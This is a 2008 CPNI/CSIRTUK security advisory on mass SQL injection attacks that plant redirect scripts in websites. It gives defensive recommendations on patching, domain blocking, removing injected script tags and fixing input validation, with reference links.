ID: 3618
Date: 23/05/2008
Title: 3618 - Mass SQL Injection attacks
Platform level affected:Net Application - Server
Hardware components affected:Intel PC
Specific operating systems components affected: 32-bit Windows
Net-enabled software: Web Server
Security software:Other
Other software: Web Browser
Remediation Summary:CPNI are monitoring the situation and will publish further advice if the risks change.
Vendors affected:N/A
Applications affected:N/A
Adversity source: Unknown
Attack Vector: Vulnerability exploitation
Virulence: Unknown
Warning Status: Active
Potential Damage: Remote execution/modification
Possible Duration: Open Ended
Availability of fix: Available
Type of fix: Patch
Source: N/A
Reliability of source: Trusted
Source URL: N/A
CVE: N/A
Abstract: CSIRTUK are aware of an increase in SQL injection attacks; the following advisory reinforces established best practice guidance.
Mass SQL Injection attacks
Background
There have been a number of recent incident and media reports of websites being compromised by SQL injection attacks. Once compromised, an additional script is added to one or more of the web pages; this redirects users to another site containing malware which attempts to exploit vulnerabilities on the user's system. Patches for most of these vulnerabilities have already been issued but may not have been installed by the system owner leaving it open to attack.
A list of some of the sites containing the malware involved in the incident can be found at:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514
Recommendations
1. System administrators should consider their patching procedures and install any missing updates.
2. Block all inbound and outbound connections to the domains listed in the link above.
3. Webmasters should check the code on their websites for unauthorised modifications, specifically injected HTML Script tags, and remove these links if present.
4. Web Developers should identify and correct any Input Validation errors in their website code.
Addition Useful URLs:
http://en.wikipedia.org/wiki/SQL_injection
http://isc.incidents.org/diary.html?storyid=4439
http://www.f-secure.com/weblog/archives/00001427.html
http://www.techworld.com/security/news/index.cfm?newsid=101510
This advisory contains information released by the original author. Some of the information may have changed since it was released. If the issue affects you, it may be prudent to retrieve the advisory from the site of the original source to ensure that you receive the most current information concerning that problem. Reference to any specific commercial product, process, or service by trade name, trademark manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favouring by CPNI.
The views and opinions of authors expressed within this notice shall not be used for advertising or product endorsement purposes. CPNI shall not accept responsibility for any errors or omissions contained within this advisory. In particular, they shall not be liable for any loss or damage whatsoever, arising from or in connection with the usage of information contained within this advisory.
CSIRTUK is a member of the Forum of Incident Response and Security Teams (FIRST) and has contacts with other international Incident Response Teams (IRTs) in order to foster cooperation and coordination in incident prevention, to prompt rapid reaction to incidents, and to promote information sharing amongst its members and the community at large.
Fri, 23 May 2008 10:00:00 GMT
Domain affected: Technical